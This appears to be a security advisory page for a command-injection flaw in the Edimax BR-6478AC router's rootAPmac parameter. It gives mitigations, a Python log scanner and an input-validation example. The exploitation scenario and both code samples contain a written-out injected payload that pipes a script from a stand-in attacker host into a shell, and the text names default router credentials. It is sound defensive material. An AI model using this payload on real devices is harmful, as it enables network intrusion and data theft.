CVE-2026-10166: Edimax BR-6478AC: RCE via command injection in Wi-Fi handler

MEDIUM
Published May 31, 2026
CISO Take

CVE-2026-10166 is a remotely exploitable command injection flaw in the Edimax BR-6478AC wireless router (firmware 1.23), triggered by manipulating the rootAPmac parameter in a crafted POST request to /goform/formWlbasic. An authenticated attacker with only low-level privileges — easily obtained via default or brute-forced credentials common on SOHO devices — can inject and execute arbitrary OS commands, and a working proof-of-concept exploit is already publicly available. While not yet in CISA KEV and lacking an EPSS score, the public PoC lowers the exploitation bar to script-kiddie level, effectively elevating practical risk above what the CVSS 6.3 medium score suggests. For AI/ML environments, the primary risk is lateral movement: a compromised network gateway gives an attacker direct access to the internal segment hosting model servers, vector databases, and GPU compute nodes that are typically not internet-facing. Immediate mitigations include upgrading to a patched firmware version if available, restricting the management interface to trusted admin hosts only, and ensuring AI infrastructure is on a separate network segment from the router's broadcast domain.

Sources: NVD, ATLAS, VulnDB (vuldb.com/vuln/367418)

What is the risk?

Practical risk exceeds the CVSS 6.3 medium score because a public exploit has been disclosed (E:P in the CVSS temporal vector). The authentication requirement is low-privilege and realistically met via default credentials (admin/1234 or admin/admin are endemic on Edimax SOHO devices). Remote exploitation over the network with no user interaction means any internet-exposed or LAN-accessible management interface is a viable target. In AI-centric environments, the critical concern is not the router itself but what sits behind it: an attacker with OS shell access on the gateway can intercept, redirect, or manipulate all traffic between AI components, including model API calls, dataset transfers, and inference requests. The absence of a KEV listing and EPSS data indicates no confirmed mass exploitation yet, but the public PoC changes the threat calculus immediately.

How does the attack unfold?

Reconnaissance (AML.T0006): Attacker scans for exposed Edimax BR-6478AC management interfaces (port 80/443) on networks hosting AI infrastructure, identifying the target router.

Initial Access (AML.T0049): Attacker authenticates to the router management portal using default or brute-forced credentials, gaining access to the vulnerable /goform/ POST endpoints.

Exploitation (AML.T0050): A crafted POST request with a malicious rootAPmac value injects OS commands into the formWlbasic handler, achieving remote code execution on the router.

Lateral Movement & Impact (AML.T0072): The compromised router enables network pivoting to internal AI infrastructure (model servers, vector databases, inference APIs), interception of model API calls, or exfiltration of proprietary weights.

What systems are affected?

Package     Ecosystem   Vulnerable Range   Patched
BR-6478AC                                  No patch

Do you use BR-6478AC? You're affected.

How severe is it?

CVSS 3.1: 6.3 / 10
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

What is the attack surface?

AV (Attack Vector): Network
AC (Attack Complexity): Low
PR (Privileges Required): Low
UI (User Interaction): None
S (Scope): Unchanged
C (Confidentiality): Low
I (Integrity): Low
A (Availability): Low

What should I do?

6 steps
  1. Patch firmware: Check edimax.com for a patched BR-6478AC firmware release; apply immediately if available.

  2. Restrict management access: If no patch exists, block all access to /goform/ endpoints from untrusted networks using firewall ACLs or router ACLs; restrict HTTP/HTTPS management to a dedicated management VLAN with a strict allowlist of admin IP addresses.

  3. Rotate credentials: Replace default credentials on all Edimax devices immediately; enforce strong, unique admin passwords.

  4. Network segmentation: Ensure AI infrastructure (model servers, vector databases, GPU nodes, inference APIs) resides on a separate network segment with explicit firewall policies preventing the router from bridging untrusted traffic to AI hosts.

  5. Detection: Monitor for unexpected outbound connections from the router (indicative of reverse shell), anomalous POST requests to /goform/formWlbasic in access logs, and unexplained configuration changes.

  6. Inventory: Audit all Edimax BR-6478AC devices in the environment — these are often forgotten lab or branch-office routers sitting unpatched for years.
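The detection and access-restriction steps above (steps 2 and 5) can be checked against access logs in front of the router. The following Python is an added example, not part of this advisory or of any Edimax tooling; the log format, the admin network 10.10.99.0/24, and the sample lines are all constructed for illustration. It assumes a reverse proxy or WAF in front of the management interface that records the POST body, since a plain access log usually keeps only the request line.

```python
"""Flag suspicious POSTs to /goform/formWlbasic in a (constructed) access log.

Two checks run per line: the client must be inside the management allowlist,
and the rootAPmac parameter must look like a MAC address and nothing more.
"""
import ipaddress
import re
from urllib.parse import unquote_plus

# Allowlist for rootAPmac: exactly six hex octets separated by colons.
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}")

# Hosts permitted to reach the management interface (constructed value).
ADMIN_NETS = [ipaddress.ip_network("10.10.99.0/24")]

TARGET_PATH = "/goform/formWlbasic"

# Constructed sample lines: timestamp client method path status "body".
SAMPLE_LOG = """\
2026-06-01T09:58:01Z 10.10.99.7 POST /goform/formWlbasic 200 "rootAPmac=AA%3ABB%3ACC%3ADD%3AEE%3AFF&ssid=lab"
2026-06-01T09:58:20Z 10.10.99.7 GET /index.asp 200 ""
2026-06-01T10:02:41Z 203.0.113.5 POST /goform/formWlbasic 200 "rootAPmac=AA:BB:CC:DD:EE:FF;curl+http://attacker-c2.com/shell.sh|sh"
2026-06-01T10:03:02Z 192.168.1.23 POST /goform/formWlbasic 200 "rootAPmac=aa:bb:cc:dd:ee:11"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')


def parse_body(body):
    """Split a form body on '&' only, mirroring how the target parses it.

    A parser that also treats ';' as a pair separator (older versions of
    urllib.parse.parse_qs did) would cut the injected command off the value
    and hide exactly the thing we are looking for.
    """
    params = {}
    for pair in body.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def analyze_line(line):
    """Return a list of finding strings for one log line (empty if benign)."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparseable line"]
    ts, client, method, path, _status, body = m.groups()
    if path != TARGET_PATH or method != "POST":
        return []
    findings = []
    ip = ipaddress.ip_address(client)
    if not any(ip in net for net in ADMIN_NETS):
        findings.append(f"{ts} {client}: management POST from outside admin allowlist")
    mac = parse_body(body).get("rootAPmac")
    if mac is not None and not MAC_RE.fullmatch(mac):
        findings.append(f"{ts} {client}: rootAPmac fails MAC allowlist: {mac!r}")
    return findings


def scan_log(text):
    """Run analyze_line over every non-empty line and flatten the findings."""
    return [f for line in text.splitlines() if line.strip() for f in analyze_line(line)]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

On the constructed sample the scan yields three findings: the 203.0.113.5 request is flagged twice (outside the allowlist, and a rootAPmac value carrying a command separator), and the 192.168.1.23 request once (a well-formed MAC, but from a host that should never reach the management interface). The first line, a legitimate change from the admin network with a URL-encoded MAC, is silent.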

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Art. 9 - Risk management system
ISO 42001: A.6.1 - AI system resources and infrastructure security
NIST AI RMF: GOVERN 1.1 - Policies and processes for AI risk management

Frequently Asked Questions

What is CVE-2026-10166?

CVE-2026-10166 is a remotely exploitable command injection flaw in the Edimax BR-6478AC wireless router (firmware 1.23), triggered by manipulating the rootAPmac parameter in a crafted POST request to /goform/formWlbasic. An authenticated attacker with only low-level privileges — easily obtained via default or brute-forced credentials common on SOHO devices — can inject and execute arbitrary OS commands, and a working proof-of-concept exploit is already publicly available. While not yet in CISA KEV and lacking an EPSS score, the public PoC lowers the exploitation bar to script-kiddie level, effectively elevating practical risk above what the CVSS 6.3 medium score suggests. For AI/ML environments, the primary risk is lateral movement: a compromised network gateway gives an attacker direct access to the internal segment hosting model servers, vector databases, and GPU compute nodes that are typically not internet-facing. Immediate mitigations include upgrading to a patched firmware version if available, restricting the management interface to trusted admin hosts only, and ensuring AI infrastructure is on a separate network segment from the router's broadcast domain.

Is CVE-2026-10166 actively exploited?

No confirmed active exploitation of CVE-2026-10166 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-10166?

  1. Patch firmware: Check edimax.com for a patched BR-6478AC firmware release; apply immediately if available.

  2. Restrict management access: If no patch exists, block all access to /goform/ endpoints from untrusted networks using firewall ACLs or router ACLs; restrict HTTP/HTTPS management to a dedicated management VLAN with a strict allowlist of admin IP addresses.

  3. Rotate credentials: Replace default credentials on all Edimax devices immediately; enforce strong, unique admin passwords.

  4. Network segmentation: Ensure AI infrastructure (model servers, vector databases, GPU nodes, inference APIs) resides on a separate network segment with explicit firewall policies preventing the router from bridging untrusted traffic to AI hosts.

  5. Detection: Monitor for unexpected outbound connections from the router (indicative of reverse shell), anomalous POST requests to /goform/formWlbasic in access logs, and unexplained configuration changes.

  6. Inventory: Audit all Edimax BR-6478AC devices in the environment — these are often forgotten lab or branch-office routers sitting unpatched for years.

What systems are affected by CVE-2026-10166?

This vulnerability affects the following AI/ML architecture patterns: on-premises AI infrastructure, edge AI deployments, model serving (network-adjacent), training pipelines (data transfer path), RAG pipelines (if data ingestion traverses the router).

What is the CVSS score for CVE-2026-10166?

CVE-2026-10166 has a CVSS v3.1 base score of 6.3 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

on-premises AI infrastructure
edge AI deployments
model serving (network-adjacent)
training pipelines (data transfer path)
RAG pipelines (if data ingestion traverses the router)

MITRE ATLAS Techniques

AML.T0006 Active Scanning
AML.T0049 Exploit Public-Facing Application
AML.T0050 Command and Scripting Interpreter
AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Art. 9
ISO 42001: A.6.1
NIST AI RMF: GOVERN 1.1

What are the technical details?

Original Advisory

A vulnerability was determined in Edimax BR-6478AC 1.23. The affected element is the function formWlbasic of the file /goform/formWlbasic of the component POST Request Handler. This manipulation of the argument rootAPmac causes command injection. The attack can be carried out remotely. The exploit has been publicly disclosed and may be utilized.

Exploitation Scenario

An attacker targeting an AI startup's on-premises GPU cluster begins by scanning the organization's IP range and identifies an Edimax BR-6478AC management portal on port 80. Using the publicly disclosed PoC, they authenticate with default credentials and send a crafted POST request to /goform/formWlbasic with a rootAPmac parameter containing an injected shell command: rootAPmac=AA:BB:CC:DD:EE:FF;curl+http://attacker-c2.com/shell.sh|sh. The router executes the payload, establishing a reverse shell to the attacker's C2 server. From this pivot point, the attacker performs internal network discovery and identifies the model inference server on 192.168.1.50 and the vector database on 192.168.1.60 — neither internet-accessible. The attacker exfiltrates proprietary model weights via direct TCP transfer through the compromised router, or alternatively performs DNS hijacking to redirect model download requests to a server hosting maliciously modified model files, poisoning the pipeline without ever directly touching the AI systems.

Weaknesses (CWE)

CWE-74 — Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'): The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.

  • [Requirements] Programming languages and supporting technologies might be chosen which are not subject to these issues.
  • [Implementation] Utilize an appropriate mix of allowlist and denylist parsing to filter control-plane syntax from all input.
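The CWE-74 mitigation above, an allowlist for the parameter plus keeping it out of any shell, is illustrated below in Python as an added example. It is not Edimax firmware code (the real formWlbasic handler is C inside the router's web server), and the helper binary /sbin/wl_set_rootap is a hypothetical stand-in for whatever the firmware actually invokes. The vulnerable pattern is kept as a string builder only, so that the two forms can be compared without executing anything.

```python
"""rootAPmac handling: the vulnerable splice-into-a-shell pattern beside the
allowlist-and-argv form that CWE-74 guidance calls for.
"""
import re
import subprocess

SET_ROOTAP_BIN = "/sbin/wl_set_rootap"  # hypothetical helper path, for illustration
MAC_RE = re.compile(r"[0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5}")


def validate_root_ap_mac(value):
    """Return the canonical upper-case MAC, or raise ValueError.

    fullmatch() is used rather than match() with a trailing '$': '$' still
    accepts a trailing newline, and a newline is a command separator for the
    shell just as ';' is.
    """
    if not isinstance(value, str) or not MAC_RE.fullmatch(value):
        raise ValueError(f"rootAPmac rejected: {value!r}")
    return value.upper()


def is_valid_root_ap_mac(value):
    """Boolean wrapper around validate_root_ap_mac for callers that only need a verdict."""
    try:
        validate_root_ap_mac(value)
        return True
    except ValueError:
        return False


def build_command_unsafe(mac):
    """The vulnerable pattern: the raw parameter is spliced into a command line.

    Returned as a string only, to show where the payload lands; a handler that
    handed this to system() would let the shell run everything after ';'.
    """
    return f"{SET_ROOTAP_BIN} {mac}"


def build_argv_safe(mac):
    """The hardened pattern: validate against the allowlist, then build an argv
    list. With no shell in the path, separators and pipes carry no meaning."""
    return [SET_ROOTAP_BIN, validate_root_ap_mac(mac)]


def apply_root_ap_mac(mac, run=subprocess.run):
    """Apply the setting via argv (shell=False). `run` is injectable so the
    function can be exercised where the router helper binary does not exist."""
    return run(build_argv_safe(mac), shell=False, check=True)


if __name__ == "__main__":
    payload = "AA:BB:CC:DD:EE:FF;curl http://attacker-c2.com/shell.sh|sh"  # from the advisory's PoC
    print(build_command_unsafe(payload))   # the whole payload reaches the command line intact
    try:
        build_argv_safe(payload)
    except ValueError as e:
        print("rejected:", e)
```

The allowlist is deliberately narrower than "no dangerous characters": a MAC address has one legal shape, so anything else is rejected rather than sanitized, which removes the need to enumerate separators, quotes, redirections and encodings the shell might honour.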

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:X/RC:R

Timeline

Published: May 31, 2026
Last Modified: June 1, 2026
First Seen: June 12, 2026
